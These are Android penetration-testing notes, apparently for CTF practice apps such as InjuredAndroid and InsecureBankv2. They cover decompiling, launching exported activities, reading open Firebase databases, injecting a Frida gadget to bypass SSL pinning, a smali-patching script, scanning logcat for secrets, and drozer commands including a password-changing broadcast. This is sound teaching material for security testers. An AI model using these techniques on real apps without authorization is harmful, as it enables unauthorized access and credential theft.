The Android Manifest (AndroidManifest.xml) is an XML file that carries the app's essential metadata: the package name, the activities and other components, which activity is the launcher (the entry point to the app), supported Android versions (minimum and target SDK), required hardware features, permissions, and other configuration. Inside the APK it is stored as binary XML, so it has to be decoded before it is readable.
Decompile the APK
apktool d apkname.apk
┌─[sheinn101@parrot]─[~/ctf/android]
└──╼ $ apktool d injuredAndroid.apk
I: Using Apktool 2.5.0-dirty on injuredAndroid.apk
I: Loading resource table...
I: Decoding AndroidManifest.xml with resources...
I: Loading resource table from file: /home/sheinn101/.local/share/apktool/framework/1.apk
I: Regular manifest package...
I: Decoding file-resources...
I: Decoding values */* XMLs...
I: Baksmaling classes.dex...
I: Copying assets and libs...
I: Copying unknown files...
I: Copying original files...
┌─[sheinn101@parrot]─[~/ctf/android/injuredAndroid]
└──╼ $ ls
AndroidManifest.xml  apktool.yml  assets  kotlin  lib  original  res  smali  unknown
Find Hardcoded Strings
Hardcoded strings usually live in res/values/strings.xml (once decoded) and in the activity code under smali/. Grep both for client credentials, exposed URLs, API keys, Firebase URLs and similar; anything that looks like a key or a token is worth trying against the service it belongs to.
Exported Activity
An exported activity is one that other apps, or any component on the device, can start. Exported activities are like public methods in Java: any other class, even from a different package, can call them. When you tap the Twitter icon on your home screen you are already inside an activity (the launcher) and you start another one (Twitter's launcher activity). If that activity were not exported (not public), nothing outside the app could start it and the app would never open. That is why every app has to export at least one activity so that the rest of Android can start it. The security question is what else the app exports: an activity marked exported that was only meant to be reached after login (an admin page, a screen showing account data) can be opened directly by any app or from adb, skipping the intended flow. This is an access-control flaw in the app's own components, not a web-style injection issue.
Look for android:exported="true" in AndroidManifest.xml. Any activity marked that way can be started from anywhere on the phone, including from a different application. Also check activities that have an <intent-filter> but no android:exported attribute: up to Android 11 (API 30) those are exported by default (apps targeting Android 12 must state it explicitly or they fail to install).
To exploit this, enter adb shell and start the activity by its component name, which is the package, a forward slash, then the activity:
am start -n b3nac.injuredandroid/.b25lActivity
Don't forget the forward slash and the leading dot: .b25lActivity is shorthand for b3nac.injuredandroid.b25lActivity, and the fully qualified name works too.
The activity pops up on the phone straight away, without passing through whatever screen normally leads to it.
In a real engagement or bug bounty you need to show that the activity gives you something you should not have: sensitive data, or a UI (an admin panel, for example) that is supposed to sit behind authentication. Reaching a harmless screen directly is not a finding by itself.
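The manifest check and the am start step above, as an added example that is not part of these notes: a small Python script that reads a decoded AndroidManifest.xml, applies the exported-by-default rule for components that have an intent filter but no android:exported attribute, and prints the adb shell am start -n command for each exported activity. The embedded manifest is constructed for the example; only the package name b3nac.injuredandroid and the MainActivity and b25lActivity names come from these notes, the other activity names are made up.

```python
"""Exported-component check for a decoded AndroidManifest.xml.

Added example, not part of the original notes. The manifest below is
constructed for this example; only the package name b3nac.injuredandroid,
MainActivity and b25lActivity come from the notes, the other activities are
made up."""
import sys
import xml.etree.ElementTree as ET

A = "{http://schemas.android.com/apk/res/android}"  # the android: attribute namespace

SAMPLE_MANIFEST = """\
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="b3nac.injuredandroid">
  <uses-sdk android:minSdkVersion="21" android:targetSdkVersion="30"/>
  <application android:label="InjuredAndroid">
    <activity android:name=".MainActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
    <activity android:name=".b25lActivity" android:exported="true"/>
    <activity android:name=".AdminPanelActivity" android:exported="false"/>
    <activity android:name="b3nac.injuredandroid.DeepLinkActivity">
      <intent-filter>
        <action android:name="android.intent.action.VIEW"/>
        <category android:name="android.intent.category.DEFAULT"/>
        <category android:name="android.intent.category.BROWSABLE"/>
        <data android:scheme="injured"/>
      </intent-filter>
    </activity>
    <activity android:name=".InternalActivity"/>
  </application>
</manifest>
"""

COMPONENT_TAGS = ("activity", "activity-alias", "service", "receiver", "provider")


def qualify(pkg, name):
    """Expand the manifest shorthand: ".Foo" and "Foo" both mean "<pkg>.Foo"."""
    if name.startswith("."):
        return pkg + name
    if "." not in name:
        return pkg + "." + name
    return name


def is_exported(elem):
    """True if other apps can reach this component.

    An explicit android:exported attribute wins. Without it, a component that
    declares an <intent-filter> was exported by default up to API 30; apps
    targeting Android 12 (API 31) must set the attribute on such components
    or the install is rejected, so a missing attribute means an older target."""
    explicit = elem.get(A + "exported")
    if explicit is not None:
        return explicit.strip().lower() == "true"
    return elem.find("intent-filter") is not None


def exported_components(manifest_xml, tags=COMPONENT_TAGS):
    """Return [(tag, fully qualified class name)] for every exported component."""
    root = ET.fromstring(manifest_xml)
    pkg = root.get("package")
    found = []
    for tag in tags:
        for elem in root.find("application").findall(tag):
            if is_exported(elem):
                found.append((tag, qualify(pkg, elem.get(A + "name"))))
    return found


def am_start_commands(manifest_xml):
    """One `adb shell am start -n <package>/<activity>` line per exported activity."""
    pkg = ET.fromstring(manifest_xml).get("package")
    return ["adb shell am start -n %s/%s" % (pkg, name)
            for _tag, name in exported_components(manifest_xml, tags=("activity",))]


if __name__ == "__main__":
    # Usage: python exported.py path/to/decoded/AndroidManifest.xml (no argument: the sample)
    xml_text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_MANIFEST
    for tag, name in exported_components(xml_text):
        print("%-14s %s" % (tag, name))
    print()
    print("\n".join(am_start_commands(xml_text)))
```

Run it against the manifest apktool produced (python exported.py injuredAndroid/AndroidManifest.xml); the am start lines can be pasted straight into an adb shell. Services, receivers and providers are listed as well because the same default-exported rule applies to them.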
When you find a Firebase URL, keep it in mind: parts of the realtime database may not be protected by security rules. Check by appending /.json to the database root (https://<project>.firebaseio.com/.json) in a browser or with curl. If unauthenticated reads are allowed the database contents come back as JSON; a properly locked-down database answers {"error" : "Permission denied"}. Try child paths too (for example /users.json), since rules can differ per node.
Dynamic Analysis
Disable SSL Pinning
Patching APK using Objection
objection can patch the application automatically: it unpacks the APK, injects a System.loadLibrary call for the Frida gadget into the launcher activity, copies the gadget into lib/, rebuilds, zipaligns and signs the result. With the gadget running inside the app, the SSL pinning bypass is applied at runtime from the objection console.
Installation: pip3 install objection (apktool, zipalign and adb must also be on the PATH)
┌─[sheinn101@parrot]─[~/ctf/android]
└──╼ $ objection patchapk --source injuredAndroid.apk
No architecture specified. Determining it using `adb`...
Detected target device architecture as: arm64-v8a
Using latest Github gadget version: 15.1.10
Patcher will be using Gadget version: 15.1.10
Detected apktool version as: 2.5.0-dirty
Running apktool empty-framework-dir...
I: Removing 1.apk framework file...
Unpacking injuredAndroid.apk
App already has android.permission.INTERNET
Target class not specified, searching for launchable activity instead...
Reading smali from: /tmp/tmpeohig7rk.apktemp/smali/b3nac/injuredandroid/MainActivity.smali
Injecting loadLibrary call at line: 10
Attempting to fix the constructors .locals count
Current locals value is 0, updating to 1:
Writing patched smali back to: /tmp/tmpeohig7rk.apktemp/smali/b3nac/injuredandroid/MainActivity.smali
Copying Frida gadget to libs path...
Rebuilding the APK with the frida-gadget loaded...
Rebuilding the APK may have failed. Read the following output to determine if apktool actually had an error:
Built new APK with injected loadLibrary and frida-gadget
Performing zipalign
Zipalign completed
Signing new APK.
Signed the new APK
Copying final apk from /tmp/tmpeohig7rk.apktemp.aligned.objection.apk to injuredAndroid.objection.apk in current directory...
Cleaning up temp files...
Sometimes this automated patch does not work properly (the rebuild fails, the APK will not install, or the app crashes on launch). In that case patch it manually.
Manual Patching
Decode the APK with apktool (the subcommand is d, not -d):
apktool d apkname.apk
Download the Frida gadget for the device's architecture from the Frida GitHub releases (frida-gadget-<version>-android-<arch>.so.xz, decompress it), rename it to libfrida-gadget.so and place it in lib/<abi>/ inside the decoded tree (lib/arm64-v8a/ for the device above). Then open the launcher activity's smali (here smali/b3nac/injuredandroid/MainActivity.smali) and add a System.loadLibrary("frida-gadget") call to its constructor, raising .locals to at least 1 if it is 0; this is the step objection logs as "Injecting loadLibrary call". Make sure the manifest declares android.permission.INTERNET, since the gadget listens on a TCP port for objection to connect to. Rebuild with apktool b <dir> (output lands in <dir>/dist/), which gives the unsigned APK called injured_patch.apk below, then sign and zipalign it:
# create keystore
keytool -genkey -v -keystore demo.keystore -alias demokeys -keyalg RSA -keysize 2048 -validity 10000
# sign the apk
jarsigner -sigalg SHA1withRSA -digestalg SHA1 -keystore demo.keystore -storepass demopass injured_patch.apk demokeys
# verify the signature
jarsigner -verify injured_patch.apk
# zipalign the APK
zipalign 4 injured_patch.apk injured_patch_final.apk
jarsigner only produces a v1 (JAR) signature, which Android 11 rejects for apps targeting API 30 or later. If the install fails for that reason, zipalign first and sign with apksigner from the SDK build-tools instead, which adds the v2 signature.
Install the patched APK on the emulator or device (adb install injured_patch_final.apk) and launch it. You will see a white screen for a little while: the gadget holds the app at startup until a client attaches. Hook it with:
objection explore
Once the console is up, run android sslpinning disable inside it; the app's traffic can then be intercepted through your proxy.
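The smali injection step of the manual patch, as an added example that is not objection's code and not from these notes: a Python function that does what objection reports as "Injecting loadLibrary call" and "fix the constructors .locals count". The smali in the block is constructed to resemble baksmali output for MainActivity; the function names, the insertion point (right after .locals in the first constructor) and the assumption that the gadget was copied to lib/<abi>/libfrida-gadget.so are mine.

```python
"""Inject System.loadLibrary("frida-gadget") into a smali constructor.

Added example, not objection's code and not from the original notes: it
reproduces the step objection reports as "Injecting loadLibrary call" and
"fix the constructors .locals count". The smali below is constructed to look
like apktool's baksmali output for the app's launcher activity; the real
file is smali/b3nac/injuredandroid/MainActivity.smali in the decoded tree.
Assumes the gadget was copied to lib/<abi>/libfrida-gadget.so, which is what
loadLibrary("frida-gadget") resolves to."""
import re
import sys

SAMPLE_SMALI = """\
.class public final Lb3nac/injuredandroid/MainActivity;
.super Landroidx/appcompat/app/AppCompatActivity;
.source "MainActivity.kt"


# direct methods
.method public constructor <init>()V
    .locals 0

    invoke-direct {p0}, Landroidx/appcompat/app/AppCompatActivity;-><init>()V

    return-void
.end method


# virtual methods
.method protected onCreate(Landroid/os/Bundle;)V
    .locals 1

    invoke-super {p0, p1}, Landroidx/appcompat/app/AppCompatActivity;->onCreate(Landroid/os/Bundle;)V

    const/4 v0, 0x0

    return-void
.end method
"""

CTOR_RE = re.compile(r"^\.method\b.*\bconstructor <init>\(")
LOCALS_RE = re.compile(r"^(\s*)\.locals (\d+)\s*$")


def inject_load_library(smali, lib="frida-gadget"):
    """Return the smali with a loadLibrary call at the top of the first constructor.

    The call goes right after the constructor's .locals directive, before the
    super <init> call: Dalvik allows static calls there as long as p0 (the
    uninitialised `this`) is not touched. const-string needs one register, so
    .locals is raised to at least 1; the p-registers are symbolic in smali and
    renumber automatically."""
    out, in_ctor, injected = [], False, False
    for line in smali.splitlines():
        if CTOR_RE.match(line):
            in_ctor = True
        elif line.startswith(".end method"):
            in_ctor = False
        m = LOCALS_RE.match(line)
        if in_ctor and not injected and m:
            indent, n = m.group(1), int(m.group(2))
            out.append("%s.locals %d" % (indent, max(n, 1)))
            out.append("")
            out.append('%sconst-string v0, "%s"' % (indent, lib))
            out.append("%sinvoke-static {v0}, Ljava/lang/System;->loadLibrary(Ljava/lang/String;)V" % indent)
            injected = True
            continue
        out.append(line)
    if not injected:
        raise ValueError("no constructor with a .locals directive found (only .locals is handled, not .registers)")
    return "\n".join(out) + "\n"


def patch_file(path, lib="frida-gadget"):
    """Patch a smali file in place; returns the new text."""
    with open(path) as f:
        patched = inject_load_library(f.read(), lib)
    with open(path, "w") as f:
        f.write(patched)
    return patched


if __name__ == "__main__":
    # Usage: python inject.py <path to MainActivity.smali>   (no argument: patch the sample and print it)
    if len(sys.argv) > 1:
        print(patch_file(sys.argv[1]))
    else:
        print(inject_load_library(SAMPLE_SMALI))
```

python inject.py injuredAndroid/smali/b3nac/injuredandroid/MainActivity.smali patches the file in place before apktool b. It only handles .locals, which is what apktool emits; a hand-written .registers directive would need the parameter count taken into account.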
Insecure Logging
Apps often write credentials, tokens or whole requests to the system log. Clear the buffer, trigger the action (a login, for example) and watch the output:
> adb logcat -c (clear the log)
> adb logcat | grep -i "password"
A single keyword misses tokens and keys, so also search for the username you typed, "token", "key" and the app's package name.
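The logcat check above, as an added example that is not part of these notes: instead of grepping for one word, a Python scanner that parses threadtime-format logcat lines and flags credentials, bearer tokens, API keys and Firebase URLs, optionally limited to the app's PID. The log lines in the block are constructed (no real device capture); tags, values and PIDs are made up, and the pattern list is my choice.

```python
"""Scan logcat output for secrets instead of grepping one keyword.

Added example, not part of the original notes. The log lines below are
constructed to look like `adb logcat -v threadtime` output (no real device
was captured); tags, PIDs and values are made up, the package name is the
one used in the notes."""
import re
import sys

SAMPLE_LOGCAT = """\
03-14 10:21:05.118  4521  4521 D LoginActivity: Attempting login for user=jack
03-14 10:21:05.120  4521  4521 D LoginActivity: password=Secret123!
03-14 10:21:05.301  4521  4560 I OkHttp  : --> POST https://api.example.test/v1/login
03-14 10:21:05.302  4521  4560 I OkHttp  : Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJqYWNrIn0.c2lnbmF0dXJl
03-14 10:21:05.650  4521  4560 D FirebaseInit: url=https://example-app.firebaseio.com/
03-14 10:21:06.002  1203  1203 I ActivityManager: Displayed b3nac.injuredandroid/.MainActivity: +320ms
03-14 10:21:06.411  4521  4521 V Cache   : api_key=AIzaSy-constructed-example-key-0123456789
"""

# threadtime format: MM-DD HH:MM:SS.mmm  PID  TID LEVEL TAG: message
LINE_RE = re.compile(
    r"^(?P<date>\d\d-\d\d) (?P<time>[\d:.]+)\s+(?P<pid>\d+)\s+(?P<tid>\d+) "
    r"(?P<level>[VDIWEF]) (?P<tag>[^:]+?)\s*: (?P<msg>.*)$")

# Checked in this order; the first match decides the category.
PATTERNS = [
    ("credential",   re.compile(r"(?i)\b(password|passwd|pwd|pin)\s*[=:]\s*\S+")),
    ("bearer_token", re.compile(r"Bearer\s+[\w-]+\.[\w-]+\.[\w-]+")),
    ("api_key",      re.compile(r"(?i)\b(api[_-]?key|secret|token)\s*[=:]\s*\S+")),
    ("firebase_url", re.compile(r"https://[\w.-]+\.firebaseio\.com")),
]


def parse_line(line):
    """Split one threadtime line into its fields, or None if it is not one."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def find_sensitive(logcat_text, pid=None):
    """Return [(category, tag, message)] for lines that leak something.

    pid restricts the scan to one process (get it with `adb shell pidof <package>`),
    which removes the noise from system services."""
    hits = []
    for raw in logcat_text.splitlines():
        rec = parse_line(raw)
        if rec is None or (pid is not None and rec["pid"] != str(pid)):
            continue
        for category, pat in PATTERNS:
            if pat.search(rec["msg"]):
                hits.append((category, rec["tag"], rec["msg"]))
                break
    return hits


if __name__ == "__main__":
    # Usage: adb logcat -v threadtime -d | python logscan.py [pid]   (no stdin: scan the sample)
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_LOGCAT
    pid = sys.argv[1] if len(sys.argv) > 1 else None
    for category, tag, msg in find_sensitive(text, pid):
        print("[%s] %s: %s" % (category, tag, msg))
```

adb logcat -v threadtime -d | python logscan.py $(adb shell pidof b3nac.injuredandroid) scans the current buffer for that app only; drop -d to keep streaming. Extend PATTERNS with whatever the app under test calls its secrets.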
Drozer Usage
Start the drozer agent app on the device and enable its embedded server (it listens on port 31415), then forward that port from the host.
Port Forward
adb forward tcp:31415 tcp:31415
Connect Drozer
drozer console connect
Show App Info
run app.package.info -a com.android.insecurebankv2
Show Activity Info
run app.activity.info -a com.android.insecurebankv2
Show Content Providers
run app.provider.finduri com.android.insecurebankv2
Check Vulnerable Injection in Content Provider
run scanner.provider.injection -a com.android.insecurebankv2
Show Broadcast Receivers
run app.broadcast.info -a com.android.insecurebankv2 -i
(-i prints each receiver's intent filter, which gives you the action string to target.)
Send a Broadcast
run app.broadcast.send --action theBroadcast --extra string <key> 095634534345 --extra string newpass NewPassword
Each --extra takes a type, a key and a value; the key names a receiver reads come from its decompiled code, not from the manifest.
Show Attack Surface
run app.package.attacksurface com.android.insecurebankv2
Run Activity Directly
run app.activity.start --component com.android.insecurebankv2 com.android.insecurebankv2.ViewStatement
(--component takes the package and the activity class; like am start from adb, it only works for exported activities.)